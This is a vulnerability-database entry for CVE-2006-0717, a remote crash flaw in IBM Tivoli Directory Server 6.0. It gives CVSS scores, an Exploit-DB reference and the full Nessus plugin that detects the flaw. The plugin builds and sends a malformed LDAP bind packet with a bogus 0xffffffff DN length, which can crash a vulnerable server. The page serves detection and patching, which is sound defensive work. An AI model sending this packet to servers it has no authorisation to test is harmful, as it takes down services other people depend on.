Vulnerabilities > CVE-2006-0717 - LDAP Memory Corruption vulnerability in IBM Tivoli Directory Server 6.0

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
ibm
nessus
exploit available

Summary

IBM Tivoli Directory Server 6.0 allows remote attackers to cause a denial of service (crash) via a crafted LDAP request, as demonstrated by test 2532 in the ProtoVer Sample LDAP test suite.

Vulnerable Configurations

Part Description Count
Application
Ibm
1

Exploit-Db

description: IBM Tivoli Directory Server 6.0 Unspecified LDAP Memory Corruption Vulnerability. CVE-2006-0717. DoS exploits for multiple platforms
id: EDB-ID:27196
last seen: 2016-02-03
modified: 2006-02-11
published: 2006-02-11
reporter: Evgeny Legerov
source: https://www.exploit-db.com/download/27196/
title: IBM Tivoli Directory Server 6.0 Unspecified LDAP Memory Corruption Vulnerability

Nessus

NASL family: Denial of Service
NASL id: TIVOLI_LDAP_DN_LENGTH_DOS.NASL
description: The remote host appears to be running IBM Tivoli Directory Server, an LDAP directory from IBM. The version of IBM Tivoli Directory Server fails to handle certain malformed search requests. A user can leverage this issue to crash the LDAP server.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 20903
published: 2006-02-14
reporter: This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.
source: https://www.tenable.com/plugins/nessus/20903
title: IBM Tivoli Directory Server LDAP Packet Handling DoS
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration pass: when 'description' is set, only the plugin metadata
# below is recorded and the script exits (see exit(0) at the end of this
# block) before any network traffic is generated.
if (description)
{
  # Plugin identity and revision tracking.
  script_id(20903);
  script_version("1.16");
  script_cvs_date("Date: 2018/11/15 20:50:21");

  # Cross-references used to correlate this finding with advisories.
  script_cve_id("CVE-2006-0717");
  script_bugtraq_id(16593);
 
  script_name(english:"IBM Tivoli Directory Server LDAP Packet Handling DoS");
  script_summary(english:"Checks for denial of service vulnerability in IBM Tivoli Directory Server");
 
  # Report text shown to the operator when the check fires.
  script_set_attribute(attribute:"synopsis", value:
"The remote LDAP server is prone to denial of service attacks." );
  script_set_attribute(attribute:"description", value:
"The remote host appears to be running IBM Tivoli Directory Server, an
LDAP directory from IBM. 

The version of IBM Tivoli Directory Server fails to handle certain
malformed search requests.  A user can leverage this issue to crash
the LDAP server." );
  # References: the original public report (archived) and three vendor
  # support documents; the solution text below points at these for fix packs.
  script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20071213090218/http://lists.immunitysec.com/pipermail/dailydave/2006-February/002921.html" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011701" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24014476" );
  script_set_attribute(attribute:"see_also", value:"http://www-1.ibm.com/support/docview.wss?uid=swg24011969" );
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate fix pack listed in the vendor support documents
referenced above." );
  # CVSS v2 base vector: network-reachable, low complexity, no
  # authentication, availability-only impact (partial).
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  # CVSS v2 temporal vector: proof-of-concept exploit code exists, an
  # official fix is available, and the report is confirmed.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2006/02/14");
  script_set_attribute(attribute:"vuln_publication_date", value: "2006/02/11");
  # "remote": the check is performed over the network, not from local
  # package or credentialed data.
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:tivoli_directory_server");
  script_end_attributes();
 
  # ACT_DENIAL: the check itself may take the LDAP service down on a
  # vulnerable host. NOTE(review): expected to be skipped when the scan
  # policy enables safe checks -- confirm against the policy in use and
  # schedule the scan with the directory's owners.
  script_category(ACT_DENIAL);
  script_family(english:"Denial of Service");

  script_copyright(english:"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.");

  # Runs after LDAP service detection and needs either a detected LDAP
  # service or the default port 389.
  script_dependencies("ldap_detect.nasl");
  script_require_ports("Services/ldap", 389);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");

# Target port: the "ldap" service as resolved by get_service(), with 389
# as the default.
port = get_service(svc: "ldap", default: 389);


# A deliberately malformed LDAP bind request, built byte by byte.
# The DN element declares a length far larger than the data that follows;
# a server that does not validate declared BER lengths against the bytes
# remaining in the message is what this probe is meant to reveal. The
# script later treats "no reply and service no longer reachable" as the
# vulnerable outcome.
req = raw_string(
  0x30,                                # universal sequence
  0x16,                                # declared length of the request
  0x02, 0x01, 0x01,                    # message id (1)
  0x60,                                # bind request
  0x12,                                #   declared length
  0x02,                                #   version (INTEGER tag)
    0x01,                              #     length
    0x03,                              #     3
  0x04,                                #   DN (OCTET STRING tag)
    0x84, 0xff, 0xff, 0xff, 0xff,      #     long-form length: four length octets, all 0xff
    "nessus",                          #     only these 6 bytes of DN data are present
  0x80, 0x00                           #   authentication (simple)
);


# Connect to the LDAP port; if the connection cannot be opened there is
# nothing to test, so stop with a non-zero status.
sock = open_sock_tcp(port);
if (!sock)
{
  exit(1);
}

# Send the single probe, read at most 1024 bytes of reply, then close.
send(socket:sock, data:req);
reply = recv(socket:sock, length:1024);
close(sock);

# A reply of any kind means the server survived the request. Only when
# nothing came back is the service re-checked, and the finding is raised
# only if that re-check reports the service as dead -- this keeps a
# silent but healthy server from being reported.
if (isnull(reply))
{
  if (service_is_dead(port:port) > 0)
  {
    security_warning(port);
  }
  exit(0);
}